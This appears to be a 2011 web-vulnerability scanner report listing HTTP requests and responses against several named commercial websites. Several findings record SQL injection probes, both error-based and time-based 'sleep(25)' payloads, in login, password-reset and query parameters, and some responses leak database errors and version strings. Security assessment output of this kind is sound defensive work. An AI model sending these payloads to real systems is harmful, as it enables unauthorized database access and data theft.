Host: | http://www.scmagazineus |
Path: | /webservice/ImageResizer |
GET /webservice/ImageResizer Host: www.scmagazineus.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_chn_cvp%3D |
HTTP/1.1 200 OK Cache-Control: private Content-Type: image/Jpeg Expires: Fri, 06 May 2011 22:52:32 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 From: Web2-VM Date: Fri, 06 May 2011 21:52:31 GMT Content-Length: 41087 ......JFIF............. ...[SNIP]... <?xml version="1.0" encoding="UTF-8"?> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.socialfollow |
Path: | / |
POST /login.php HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow Cache-Control: max-age=0 Origin: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 Content-Length: 31 tEmail=Email&pPassword=Password |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:37:53 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=71434cdaab Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 4494 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... |
GET / HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:38:43 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=383d3a7937 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7330 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/forgot-password ...[SNIP]... <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value= ...[SNIP]... <label for="tPassword">Password:</label> ...[SNIP]... <input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /> ...[SNIP]... <label for="tRePassword">Password (retype):</label> ...[SNIP]... <input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /> ...[SNIP]... field is required");fv.addVal ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.socialfollow |
Path: | /blog/ |
POST /login.php HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow Cache-Control: max-age=0 Origin: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 Content-Length: 31 tEmail=Email&pPassword=Password |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:37:53 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=71434cdaab Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 4494 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... |
GET /blog/ HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:39:52 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 X-Pingback: http://www.socialfollow Set-Cookie: PHPSESSID=f9e5973c7f Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 96431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head pro ...[SNIP]... <a href="/forgot-password ...[SNIP]... <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value= ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://events.gsmiweb |
Path: | /subscribe.php |
GET /subscribe.php?event_id=(select+1+and+row(1%2c1)%3e Host: events.gsmiweb.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=246713051 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:43:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 130 Connection: close Content-Type: text/html <script language="javascript"> window.location.href= </script> Duplicate entry '_!@4dilemma:0' for key 1 |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://login.vindicosuite |
Path: | /AccountManager |
POST /AccountManager Referer: http://login.vindicosuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: login.vindicosuite.com Cookie: ASPSESSIONIDSSSCTDAT Accept-Encoding: gzip, deflate Content-Length: 204 username=(select+convert(int,CHAR(95) |
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 172 Content-Type: text/html Location: index.asp?message=Invalid Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:31:20 GMT <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="index.asp?message |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://login.vindicosuite |
Path: | /AccountManager |
GET /AccountManager User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: login.vindicosuite.com Cookie: ASPSESSIONIDSSSCTDAT Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3689 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:20:59 GMT <!DOCTYPE html> <html xmlns="http://www.w3.org <!-- edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM --> <head> <title>Password Reset</title> <script type="text ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://login.vindicosuite |
Path: | /default.asp |
GET /default.asp?message=(select+convert(int,CHAR(95) User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: login.vindicosuite.com Cookie: ASPSESSIONIDSSSCTDAT Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2404 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:21:34 GMT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <META HTTP-EQUIV="CACHE-CONTROL <link rel="stylesheet" type="text/css" hre ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://login.vindicosuite |
Path: | /vindico_dynamic.asp |
POST /vindico_dynamic.asp HTTP/1.1 Referer: http://login.vindicosuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: login.vindicosuite.com Cookie: ASPSESSIONIDSSSCTDAT Accept-Encoding: gzip, deflate Content-Length: 186 password=(select+convert(int,CHAR(95) |
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 182 Content-Type: text/html Location: /default.asp?message Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:31:20 GMT <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=slhdu6ps00 Accept-Encoding: gzip, deflate Content-Length: 119 btnCancel=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:30:50 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3810 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /index.php |
POST /index.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=todvqp9ae2 Accept-Encoding: gzip, deflate Content-Length: 115 btnLogin=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:52:36 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5083 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.angege.com |
Path: | /links.php |
GET /links.php?data=rSe_2%2F Host: www.angege.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 15:45:51 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.2.4 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 226 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33) ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.caribbean |
Path: | /get-image.php |
GET /get-image.php?id=(select+1+and+row(1%2c1)%3e Referer: http://www.caribbean User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.caribbean-ocean.com Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 16:00:03 GMT Server: Apache/2.2.4 (Linux/SUSE) Content-Length: 1166 Content-Type: image/jpg Warning: mysql_query(): Unable to save result set in /home/chroot/home/james 1062: Duplicate entry '_!@5.0.45-community-log_ ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.scout.com |
Path: | /2/a.z |
GET /2/a.z?cfg=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 19:56:57 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:06:57 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 12251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.scout.com |
Path: | /a.z |
GET /a.z?s=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&p=9&c User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 19:58:26 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb9 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 X-Streamed: from 192.168.20.181 in 34 ms Cache-Control: public, s-maxage=600 Expires: Fri, 06 May 2011 20:08:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12463 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.socialfollow |
Path: | /button/image/ |
GET /button/image/?b=(select+convert(int,CHAR(95) User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Cache-Control: no-cache Host: www.socialfollow.com Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: 0 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>FireHost Protection</title> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://broker.gotoassist |
Path: | /h/lbmc |
GET /h/lbmc?Portal=lbmc Host: broker.gotoassist.com Connection: keep-alive Referer: http://www.gotoassist.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:43:47 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Set-Cookie: dtsSession=SessionInfo Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 8818 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>GoToAssist: live online customer support</title> <script language="JavaScript"> <!-- function empty ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://events.gsmiweb |
Path: | /subscribe.php |
GET /subscribe.php HTTP/1.1 Host: events.gsmiweb.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=246713051 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:38:48 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=2nk15qm3tn Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 307 Connection: close Content-Type: text/html <script language="javascript"> window.location.href= </script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the ri ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.opinionlab |
Path: | /ccc01/comment_card.asp |
GET /ccc01/comment_card.asp Host: secure.opinionlab.com Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 07 May 2011 02:48:21 GMT Content-Type: text/html; Charset=UTF-8 Cool01: Opinionlab - Cool01 Set-Cookie: ASPSESSIONIDQCRBQCAC Vary: Accept-Encoding Content-Length: 8271 <!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure <title>Comment ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: secure.trust-guard.com Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:58:13 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=a0np6gkb2v Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:01:18 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=523ir1s45t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: secure.trust-guard.com Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:54:04 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=uh9nm4eto5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://subscribe |
Path: | /scm/ |
GET /scm/?form= HTTP/1.1 Host: subscribe.haymarketmedia Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:49:16 GMT Content-Length: 5394 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><link href="Pubs/SC ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://support.trust |
Path: | /visitor/index.php |
GET /visitor/index.php?_m Host: support.trust-guard.com Connection: keep-alive Referer: https://www.trust-guard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:49:42 GMT Server: Apache/1.3.41 Ben-SSL/1.59 Cache-Control: max-age=3600, must-revalidate Expires: Sun, 08 May 2011 00:49:42 GMT X-Powered-By: PHP/5.2.17 Set-Cookie: SWIFT_visitor=a%3A1%3A Set-Cookie: SWIFT_sessionid80 Set-Cookie: SWIFT_visitor=a%3A3%3A Keep-Alive: timeout=2, max=200 Connection: Keep-Alive Content-Type: text/javascript Content-Length: 11601 //======================= // Kayako LiveResponse // Copyright (c) 2001-2011 // http://www.kayako.com // License: http://www.kayako.com //======================= var sessio ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.clone-systems |
Path: | /ecommerce/index.php |
GET /ecommerce/index.php Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: www.clone-systems.com Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:55:30 GMT Server: Apache Set-Cookie: SHOP_SESSION_TOKEN Expires: Sat, 14 May 2011 00:55:30 +0000 Cache-Control: public,maxage=604800 Pragma: public Content-Length: 191 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript var img = new Image(1, 1); img.src = 'https://www.clone img.onload = function() { return true; }; |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.clone-systems |
Path: | /stylesheet.php |
GET /stylesheet.php?cssid=31 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: www.clone-systems.com Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:04:33 GMT Server: Apache Set-Cookie: CMSSESSIDe4d04fcf Expires: Sat, 07 May 2011 04:04:33 GMT Cache-Control: public, max-age=10800 Last-Modified: Sat, 07 May 2011 00:54:52 GMT X-Powered-By: Nette Framework Etag: "f1688bee3cc8398af5a Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css; charset=utf-8 Content-Length: 2811 /* Start of CMSMS style sheet 'Accessibility and cross-browser tools' */ /* accessibility */ /* menu links accesskeys */ span.accesskey { text-decoration: none; } /* accessibility divs are hidde ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.taxnotebook |
Path: | /Login/PopupMessage.aspx |
GET /Login/PopupMessage.aspx Host: www.taxnotebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:49:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: SessionStateGUID=6faf2a0c Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 6653 <img src='../images/tnlogo.gif <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Tax Notebook</title> <LINK href="../Main.css" typ ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.taxnotebook |
Path: | /Login/TNLogin.aspx |
GET /Login/TNLogin.aspx HTTP/1.1 Host: www.taxnotebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: refaccno=759456; ASPSESSIONIDAABTDSBD |
